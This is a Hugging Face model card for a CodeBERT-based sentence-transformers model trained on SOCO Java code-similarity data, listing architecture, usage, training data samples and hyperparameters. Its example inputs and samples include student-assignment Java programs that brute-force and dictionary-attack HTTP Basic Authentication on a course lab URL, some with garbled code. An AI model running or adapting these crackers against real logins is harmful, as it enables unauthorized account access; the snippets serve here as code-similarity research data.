SentenceTransformer based on microsoft/codebert-base
This is a sentence-transformers model finetuned from microsoft/codebert-base. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: microsoft/codebert-base
- Maximum Sequence Length: 512 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERT-ST")
# Run inference
sentences = [
'\nimport java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary\n{\n private String myUsername = "";\n private String myPassword = "";\n private String urlToCrack = "http://sec-crack.cs.rmit.edu./SEC/2";\n\n\n public static void main (String args[])\n {\n Dictionary d = new Dictionary();\n }\n\n public Dictionary()\n {\n generatePassword();\n }\n\n \n\n public void generatePassword()\n {\n try\n {\n BufferedReader = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));\n\n \n {\n myPassword = bf.readLine();\n crackPassword(myPassword);\n } while (myPassword != null);\n }\n catch(IOException e)\n { }\n }\n\n\n \n\n public void crackPassword(String passwordToCrack)\n {\n String data, dataToEncode, encodedData;\n\n try\n {\n URL url = new URL (urlToCrack);\n\n \n\n dataToEncode = myUsername + ":" + passwordToCrack;\n\n \n\n encodedData = new bf.misc.BASE64Encoder().encode(dataToEncode.getBytes());\n\n URLConnection urlCon = url.openConnection();\n urlCon.setRequestProperty ("Authorization", " " + encodedData);\n\n InputStream is = (InputStream)urlCon.getInputStream();\n InputStreamReader isr = new InputStreamReader(is);\n BufferedReader bf = new BufferedReader (isr);\n\n \n {\n data = bf.readLine();\n System.out.println(data);\n displayPassword(passwordToCrack);\n } while (data != null);\n }\n catch (IOException e)\n { }\n }\n\n\n public void displayPassword(String foundPassword)\n {\n System.out.println("\\nThe cracked password is : " + foundPassword);\n System.exit(0);\n }\n}\n\n\n',
'\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String strFilepath;\n private String strCurrWord;\n private File fWordFile;\n private BufferedReader in;\n \n \n public PasswordFile(String filepath) {\n strFilepath = filepath;\n try {\n fWordFile = new File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n }\n catch(Exception e)\n {\n System.out.println("Could not open file " + strFilepath);\n }\n }\n \n String getPassword() {\n return strCurrWord;\n }\n \n String getNextPassword() {\n try {\n strCurrWord = in.readLine();\n \n \n \n }\n catch (Exception e)\n {\n \n return null;\n }\n \n return strCurrWord;\n }\n \n}\n',
'\n\n\nimport java.misc.BASE64Encoder;\nimport java.misc.BASE64Decoder;\n\nimport java.io.*;\nimport java.net.*;\nimport java.util.*;\n\n\npublic class BruteForce {\n \n static char [] passwordDataSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".toCharArray();\n \n private int indices[] = {0,0,0};\n \n private String url = null;\n\n \n public BruteForce(String url) {\n this.url = url;\n\n }\n \n private int attempts = 0;\n private boolean stopGen = false;\n \n public String getNextPassword(){\n String nextPassword = "";\n for(int i = 0; i <indices.length ; i++){\n if(indices[indices.length -1 ] == passwordDataSet.length)\n return null;\n if(indices[i] == passwordDataSet.length ){\n indices[i] = 0;\n indices[i+1]++;\n }\n nextPassword = passwordDataSet[indices[i]]+nextPassword;\n\n if(i == 0)\n indices[0]++;\n\n }\n return nextPassword;\n }\n \n public void setIndices(int size){\n this.indices = new int[size];\n for(int i = 0; i < size; i++)\n this.indices[i] = 0;\n }\n public void setPasswordDataSet(String newDataSet){\n this.passwordDataSet = newDataSet.toCharArray();\n }\n \n public String crackPassword(String user) throws IOException, MalformedURLException{\n URL url = null;\n URLConnection urlConnection = null;\n String outcome = null;\n String authorization = null;\n String password = null;\n BASE64Encoder b64enc = new BASE64Encoder();\n InputStream content = null;\n BufferedReader in = null;\n String line;\n int i = 0;\n while(!"HTTP/1.1 200 OK".equalsIgnoreCase(outcome)){\n url = new URL(this.url);\n urlConnection = url.openConnection();\n urlConnection.setDoInput(true);\n urlConnection.setDoOutput(true);\n\n\n urlConnection.setRequestProperty("GET", url.getPath() + " HTTP/1.1");\n urlConnection.setRequestProperty("Host", url.getHost());\n password = getNextPassword();\n if(password == null)\n return null;\n System.out.print(password);\n authorization = user + ":" + password;\n\n\n urlConnection.setRequestProperty("Authorization", " "+ b64enc.encode(authorization.getBytes()));\n\n\noutcome = urlConnection.getHeaderField(null); \n\n\n\n this.attempts ++;\n urlConnection = null;\n url = null;\n\n if(this.attempts%51 == 0)\n for(int b = 0; b < 53;b++)\n System.out.print("\\b \\b");\n else\n System.out.print("\\b\\b\\b.");\n\n }\n return password;\n }\n \n public int getAttempts(){\n return this.attempts;\n }\n public static void main (String[] args) {\n if(args.length != 2){\n System.out.println("usage: java attacks.BruteForce <url crack: e.g. http://sec-crack.cs.rmit.edu./SEC/2/> <username: e.g. >");\n System.exit(1);\n }\n\n BruteForce bruteForce1 = new BruteForce(args[0]);\n try{\n Calendar cal1=null, cal2=null;\n cal1 = Calendar.getInstance();\n System.out.println("Cracking started at: " + cal1.getTime().toString());\n String password = bruteForce1.crackPassword(args[1]);\n if(password != null)\n System.out.println("\\nPassword is: "+password);\n else\n System.out.println("\\nPassword could not retrieved!");\n cal2 = Calendar.getInstance();\n System.out.println("Cracking finished at: " + cal2.getTime().toString());\n Date d3 = new Date(cal2.getTime().getTime() - cal1.getTime().getTime());\n System.out.println("Total Time taken crack: " + (d3.getTime())/1000 + " sec");\n System.out.println("Total attempts : " + bruteForce1.getAttempts());\n\n }catch(MalformedURLException mue){\n mue.printStackTrace();\n }\n\n catch(IOException ioe){\n ioe.printStackTrace();\n }\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Training Details
Training Dataset
Unnamed Dataset
- Size: 33,411 training samples
- Columns:
sentence_0,sentence_1, andlabel - Approximate statistics based on the first 1000 samples:
sentence_0 sentence_1 label type string string int details - min: 61 tokens
- mean: 471.36 tokens
- max: 512 tokens
- min: 61 tokens
- mean: 491.01 tokens
- max: 512 tokens
- 0: ~99.50%
- 1: ~0.50%
- Samples:
sentence_0 sentence_1 label
public class ImageFile
{
private String imageUrl;
private int imageSize;
public ImageFile(String url, int size)
{
imageUrl=url;
imageSize=size;
}
public String getImageUrl()
{
return imageUrl;
}
public int getImageSize()
{
return imageSize;
}
}
import java.net.;
import java.io.;
import java.util.Date;
public class MyMail implements Serializable
{
public static final int SMTPPort = 25;
public static final char successPrefix = '2';
public static final char morePrefix = '3';
public static final char failurePrefix = '4';
private static final String CRLF = "\r\n";
private String mailFrom = "";
private String mailTo = "";
private String messageSubject = "";
private String messageBody = "";
private String mailServer = "";
public MyMail ()
{
super();
}
public MyMail ( String serverName)
{
super();
mailServer = serverName;
}
public String getFrom()
{
return mailFrom;
}
public String getTo()
{
return mailTo;
}
public String getSubject()
{
return messageSubject;
}
public String getMessage()
{
return messageBody;
}
public String getMailServer()
{
return mailServer;
}
public void setFrom( String from )
{
mailFr...0
import java.util.;
import java.net.;
import java.io.*;
public class WatchDog
{
private Vector init;
public WatchDog()
{
try
{
Runtime run = Runtime.getRuntime();
String command_line = "lynx http://www.cs.rmit.edu./students/ -dump";
Process result = run.exec(command_line);
BufferedReader in = new BufferedReader(new InputStreamReader(result.getInputStream()));
String inputLine;
init = new Vector();
while ((inputLine = in.readLine()) != null)
{
init.addElement(inputLine);
}
}catch(Exception e)
{
}
}
public static void main(String args[])
{
WatchDog wd = new WatchDog();
wd.nextRead();
}
public void nextRead()
{
while(true)
{
ScheduleTask sch = new ScheduleTask(init);
if(sch.getFlag()!=0)
{
System.out.println("change happen");
WatchDog wd = new WatchDog();
wd.nextRead();
}
}
}
}
import java.net.;
import java.io.;
import java.util.*;
public class Dictionary{
private static URL location;
private static String user;
private BufferedReader input;
private static BufferedReader dictionary;
private int maxLetters = 3;
public Dictionary() {
Authenticator.setDefault(new MyAuthenticator ());
startTime = System.currentTimeMillis();
boolean passwordMatched = false;
while (!passwordMatched) {
try {
input = new BufferedReader(new InputStreamReader(location.openStream()));
String line = input.readLine();
while (line != null) {
System.out.println(line);
line = input.readLine();
}
input.close();
passwordMatched = true;
}
catch (ProtocolException e)
{
}
catch (ConnectException e) {
System.out.println("Failed connect");
}
catch (IOException e) ...0
import java.util.;
import java.net.;
import java.io.*;
public class ScheduleTask extends Thread
{
private int flag=0,count1=0,count2=0;
private Vector change;
public ScheduleTask(Vector init)
{
try
{
Runtime run = Runtime.getRuntime();
String command_line = "lynx http://yallara.cs.rmit.edu./~/index.html -dump";
Process result = run.exec(command_line);
BufferedReader in = new BufferedReader(new InputStreamReader(result.getInputStream()));
String inputLine;
Vector newVector = new Vector();
change = new Vector();
while ((inputLine = in.readLine()) != null)
{
newVector.addElement(inputLine);
}
if(init.size()>newVector.size())
{
for(int k=0;k {
if(!newVector.elementAt(k).toString().equals(init.elementAt(k).toString()))
ch...import java.io.;
import java.net.;
import java.util.*;
public class Dictionary
{
public static void main (String args[])
{
Calendar cal = Calendar.getInstance();
Date now=cal.getTime();
double startTime = now.getTime();
String password=getPassword(startTime);
System.out.println("The password is " + password);
}
public static String getPassword(double startTime)
{
String password="";
int requests=0;
try
{
FileReader fRead = new FileReader("/usr/share/lib/dict/words");
BufferedReader buf = new BufferedReader(fRead);
password=buf.readLine();
while (password != null)
{
if (password.length()<=3)
{
requests++;
if (testPassword(password, startTime, requests))
return password;
}
password = buf.readLine();
}
}
catch (IOException ioe)
{
}
return password;
}
private static boolean testPassword(String password, double startTime, int requests)
{
try
{
U...0 - Loss:
BatchAllTripletLoss
Training Hyperparameters
Non-Default Hyperparameters
per_device_train_batch_size: 16per_device_eval_batch_size: 16num_train_epochs: 1multi_dataset_batch_sampler: round_robin
All Hyperparameters
Click to expand
overwrite_output_dir: Falsedo_predict: Falseeval_strategy: noprediction_loss_only: Trueper_device_train_batch_size: 16per_device_eval_batch_size: 16per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 5e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1num_train_epochs: 1max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.0warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Falsefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters:auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: round_robin
Training Logs
| Epoch | Step | Training Loss |
|---|---|---|
| 0.2393 | 500 | 0.1875 |
| 0.4787 | 1000 | 0.1815 |
| 0.7180 | 1500 | 0.24 |
| 0.9574 | 2000 | 0.1596 |
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
BatchAllTripletLoss
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
- Downloads last month
- -
Model tree for buelfhood/SOCO-Java-CodeBERT-ST
Base model
microsoft/codebert-base